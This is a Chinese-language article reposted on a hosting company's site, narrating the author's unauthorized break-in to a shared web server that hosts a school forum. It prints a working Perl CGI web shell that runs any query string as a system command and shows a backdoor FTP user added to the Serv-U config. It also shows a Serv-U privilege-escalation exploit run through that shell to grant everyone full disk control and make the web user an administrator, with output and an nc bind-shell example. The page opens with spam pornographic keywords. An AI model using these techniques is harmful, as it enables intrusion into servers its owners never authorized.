人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動態(tài)

入侵一個管理員設(shè)置的超Bt服務(wù)器

發(fā)布日期:2021-12-28 01:08 | 文章來源:腳本之家
以前入侵少之又少,都是研究這樣研究那樣,實戰(zhàn)經(jīng)驗太欠缺了,所以決定暑假惡補一下滲透技術(shù),順便又可以看看國內(nèi)主機的安全性。暑假 6 月整整學習了一個月的滲透,從 xiaolu 身上學習到不少好的思路和經(jīng)驗。在此謝謝xiaolu 了。 一個多月的時間里,滲透過上百臺服務(wù)器,有獨立的,有虛擬主機的,有群組的,有國內(nèi)和國外,我發(fā)現(xiàn)一個極其嚴重的問題,國外的服務(wù)器,普遍安全性都非常高,管理員的安全意識非常高,做個比例,如果國內(nèi)平均每 10 臺服務(wù)器,能滲透進去 6 臺甚至更多,那國外、臺灣的,平均每 10 臺服務(wù)器僅僅能滲透 1 臺。當然我的水平也是一個問題。可是卻反映出國內(nèi)的管理員的水平的的確確比國外的要差幾個檔次。國內(nèi)的管理員的技術(shù)和意識,迫切需要大幅度提高。 不過國內(nèi)的也有比較 BT 的管理員,我就遇見幾個服務(wù)器設(shè)置得非常。其中一個的 Documents and Settings 目錄下還有 nsfocus 目錄,難道是 nsfocus 公司幫做的安全?這個服務(wù)器我們沒有拿下,還有另外一個,就是今天的重點。 一次看見了一個學校論壇(http://www.*****.com),還蠻火爆的,頓時興趣來了, ping 了一下,發(fā)現(xiàn) 4 個包都返回 Request timed out. 估計是搞了策略或者防火墻的,象我這種以 Web 安全的,自然喜歡從站點上找漏洞,自從學習 Web 開始,我就落下一個怪癖,就是如果實在從 Web 上找不到什么漏洞,寧愿放棄也不用什么漏洞掃描器。 大概看了看站點。就是一個論壇,采用 LeadBBS ,拿這個論壇沒轍,還有其他辦法,因為剛才我訪問這個 IP ,返回“No web site is configured at this address.”,初步判斷是虛擬主機,前段時間那幾個黑站狂黑站的成功幾率為什么這么高?因為有 http://whois.webhosting.info 這個網(wǎng)站,可以查詢一個 IP 上,綁定了多少個域名。如果真的是虛擬主機,這個學校論壇沒有漏洞,不代表其他站點就沒有,很快的,我就通過一個小公司站點( http://anyhost/ )上的 DVBBS 6.0 傳了一個 aspshell 上去,誰知道僅僅能夠?qū)ψ约旱哪夸涍M行操作。而且自己的目錄沒有執(zhí)行程序的權(quán)限,又用不了 Nfso ,手工跳轉(zhuǎn) URL 中的目錄,也沒有多少個可以瀏覽的,重要的 Program Files 和 Documents and Settings 目錄都看不了,從 aspshell 反饋的信息來看,每個站點都設(shè)置了單獨的用戶,似乎一切都陷入僵局。 沒有目的的跳轉(zhuǎn)目錄著…… 我習慣性的在 URL 跳轉(zhuǎn)到 c:\php,沒想到居然可以看見了,那這個主機很可能就會支持 php 了,馬上傳了一個 phpspy 上去,非常幸運,順利看到了登陸入口,可是沒想到進入以后才發(fā)現(xiàn),php.ini 亦設(shè)置得異常 BT,安全模式打開了, phpinfo 函數(shù)也被禁用了,看不了詳細的系統(tǒng)信息,不過看 phpspy 自帶的探針可以發(fā)現(xiàn),allow_url_fopen、display_errors、 register_globals 統(tǒng)統(tǒng)關(guān)閉,system、passthru、exec、shell_exec 幾個函數(shù)都無一幸免的被禁用了,直接跳轉(zhuǎn)目錄還是只可以看到這些目錄而已,各個站點的目錄都是類似于 “D:\websites\school.com#dlfjurdlkfjk” 這樣的,每個站點目錄后面的那些字符串都不一樣,也跳轉(zhuǎn)不到,后來我猜測后面的字符串就是 ftp 密碼,試驗了一下,無法登陸,看似柳暗花明,希望又破滅了…… 結(jié)束了嗎?不,我試著 FTP 一下: Microsoft Windows 2000 [Version 5.00.2195] (C) 版權(quán)所有 1985-2000 Microsoft Corp. C:\Documents and Settings\Administrator>ftp www.*****.com Connected to www. school.com. 220 Welcome to FTP Server... User (www.bjtrq.com:(none)): 331 User name okay, need password. Password: 530 Not logged in. Login failed. ftp> bye 221 Goodbye! 從返回的信息判斷,我們還是有希望的。盡管他修改了 FTP Server 的 Banner,但是從 User name okay, need password. 這句我們還是大膽的判斷這個服務(wù)器就是采用 Serv-U ,我上手有目前所有版本 Serv-U 本地提升權(quán)限的 Exploit ,如果我能傳一個上去,并且能夠執(zhí)行,一切就明朗了。再仔細想想有哪個目錄可以寫的?當時在 c:\php 目錄下沒有發(fā)現(xiàn) sessiondata 目錄,而且也不是自動安裝版,估計管理員把 session 的目錄換到其他地方了,不然這個目錄是 everyone 可寫的…… 原來我還忘記了一個最重要的目錄, C:\Documents and Settings\All Users ,從這個目錄可以知道很多信息,這個目錄一般、至少都是 everyone 可讀的,這樣我們就可以知道好多有用的信息了,直接通過我的 aspshell 手工跳轉(zhuǎn)到這個目錄,呵呵。馬上看到了想看的目錄樹。 Application Data Documents DRM Favorites Templates 「開始」菜單 桌面 馬上試試建目錄,可惜里面的目錄包括子目錄都無法新建, BT 管理員權(quán)限設(shè)置得還真嚴格,不過我們還是有收獲的,那就是 “C:\Documents and Settings\All Users\ 「開始」菜單 \ 程序 \”目錄里,看到了很多決定結(jié)果的有用信息, ActiveState ActivePerl 5.8 Administrative Tools Deerfield.com DTemp IPSentry MBM 5 NetMeter Network ICE Persits Software AspEmail Persits Software AspJpeg Serv-U FTP Server Symantec Client Security Windows 優(yōu)化大師 WinRAR 啟動 管理工具 附件 呵呵,現(xiàn)在我們知道了好多有用的信息了,看著這些東西,可以看得出管理員對安全、效率很在意,裝了 Perl,也就是說可能支持 cgi 了, IPSentry 這個可以實時檢測網(wǎng)站的各類服務(wù), 當某服務(wù)停止時, 該軟件會打 Pager, 或 EMAIL,或發(fā)聲,或運行其它軟件來提醒管理員,確保服務(wù)器出現(xiàn)問題能及時處理,說明管理員比較負責任,NetMeter 可以對網(wǎng)絡(luò)流量進行監(jiān)控,裝了黑冰防火墻和諾頓殺毒服務(wù)器版,說明管理員對于服務(wù)器的安全是很小心的,這還不算,還裝了另外一個防火墻—— VisNetic Firewall,真是 BT 到家了,裝了優(yōu)化大師,看得出這個管理員還是比較愛清潔的。從管理工具里面我們還看到了終端服務(wù)客戶端生成器.lnk 、終端服務(wù)配置.lnk ,還有終端服務(wù),這下好了,說不定順利就可以多一臺 3389 肉雞了。 先通過 aspshell 下載 Serv-U 的任意一個快捷方式,然后本地查看屬性的目標,呵呵,原來 Serv-U 的目錄是 "C:\Program Filesewfq4qrqtgy4635\Serv-U\" ,這下好了,直接跳轉(zhuǎn)目錄。OH~,yes~~,看到了,馬上修改 ServUDaemon.ini文件,這個服務(wù)器居然放了 280 個用戶,狂暈……不管了,先在添加 [Domain1] 里加一行: User281=angel|1|0 然后加上 [USER=angel|1] Password=ng98F85379EA68DBF97BAADCA99B69B805 HomeDir=D:\websites RelPaths=1 TimeOut=600 Maintenance=System Access1=D:\websites|RWAMELCDP SKEYValues= 添加一個 angel,密碼為 111111 的用戶,具有最高權(quán)限執(zhí)行,然后我們就可以 ftp 上去 quote site exec xxxxxxxx 了,嘻嘻偷笑中…… 不過殘酷現(xiàn)實再一次粉碎了我的計劃,修改好文件以后提交,居然是沒有修改成功,看來還是權(quán)限,權(quán)限權(quán)限整慘人啊。 不過還是有希望的,因為剛才我們看到了系統(tǒng)裝了黑冰,有些版本存在“ISS RealSecure/BlackICE 協(xié)議分析模塊 SMB 解析堆溢出漏洞”,可以遠程利用的,手頭上沒有編譯器,沒有辦法編譯代碼。 還有就是 Perl,這個是個很大的突破口,因為 Perl 目錄一般要 erveryone 完全控制的,不管他用 isap 還是 perl.exe 一般都是可寫、可執(zhí)行的,馬上下載 Perl 的快捷方式來看看路徑,呵呵,看到了,原來 D:\user\bin 就是存放 perl 的 bin 目錄下的所有文件,這么說這個目錄可能可以寫,也可能可以執(zhí)行咯,馬上傳一個 su.exe(針對目前所有版本的 Serv-U 本地提升權(quán)限漏洞)上去,呵呵,傳上去了,太好了,現(xiàn)在就是執(zhí)行了,剛才我們試了 aspshell、phpshell 都不行,現(xiàn)在就看最后的希望了,找呀找啊,終于在我硬盤上找到一個 cgishell,很老了,文件日期是 2002 年 6 月 30 日的,代碼如下: #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27); $Content$ = $ENV{QUERY_STRING}; s/ / /ig; s///\//ig; $execthis = $Content$ ; syswrite(STDOUT, " \r\n", 13); open(STDERR, ">&STDOUT") || die "Can’t redirect STDERR"; system($execthis); syswrite(STDOUT, "\r\n \r\n", 17); close(STDERR); close(STDOUT); exit; 我用過最好的 cgishell ,保存為一個 cgi 文件執(zhí)行,暈……居然不支持!一陣陣郁悶襲來,2 秒鐘的郁悶后,想到還有一線希望,那就是pl ,我們還沒有試試 pl 擴展呢,把剛才的 cgi 文件改為 pl 文件,提交 http://anyhost//cmd.pl?dir ,我的天啊?。?顯示“拒絕訪問”,終于可以執(zhí)行了!太興奮了,馬上提交: http://anyhost//cmd.pl?d:\user\bin\su.exe 返回: Serv-u >3.x Local Exploit by xiaolu USAGE: serv-u.exe "command" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 嘻嘻~~現(xiàn)在是 IUSR 權(quán)限,那又怎么樣?看你這次還不死?提交: http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F" http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F" http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F" http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F" 返回下面的信息,就表示成功了?。。?Serv-u >3.x Local Exploit by xiaolu <220 Serv-U FTP Server v5.2 for WinSock ready... >USER LocalAdministrator <331 User name okay, need password. ****************************************************** >PASS #l@$ak#.lk;0@P <230 User logged in, proceed. ****************************************************** >SITE MAINTENANCE ****************************************************** [ ] Creating New Domain... <200-DomainID=2 <220 Domain settings saved ****************************************************** [ ] Domain xl:2 Created [ ] Creating Evil User <200-User=xl 200 User settings saved ****************************************************** [ ] Now Exploiting... >USER xl <331 User name okay, need password. ****************************************************** >PASS 111111 <230 User logged in, proceed. ****************************************************** [ ] Now Executing: cacls.exe c: /E /T /G everyone:F <220 Domain deleted ****************************************************** 每提交完一次都稍微等一下,因為這些命令需要時間處理的,不一會兒,就把所有分區(qū)設(shè)置為 everyone 完全控制了,可以任意操作硬盤的東西了,但是有些命令還是受了限制,因為權(quán)限還沒有提升,現(xiàn)在我們把自己的用戶提升為管理員: http://anyhost//cmd.pl?d:\user\bin\su.exe " net l ... s IUSR_anyhost /add" 現(xiàn)在我們通過 web 方式,執(zhí)行的命令就是以 administrator 的身份執(zhí)行的了,相信到這里,下面的事該做什么,大家應該知道了吧?馬上找到那個學校的目錄,進去咯~~目的達到了,本來還想做一個 3389 的肉雞的,想想算了,這種 BT 管理員的地盤,我也占領(lǐng)不了多久,留點提示到他的桌面就 over 了。 說真的,搞安全這么久,從來沒有遇見這么棘手的虛擬主機,要不是裝了 Perl,還真是束手無策!本文技術(shù)含量不高,只是分享一下希望其中的思路,如果有一個人從中受益,這篇文章就完成它的使命了。

版權(quán)聲明:本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學習參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。

相關(guān)文章

實時開通

自選配置、實時開通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問服務(wù)

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時在線

客服
熱線

400-630-3752
7*24小時客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部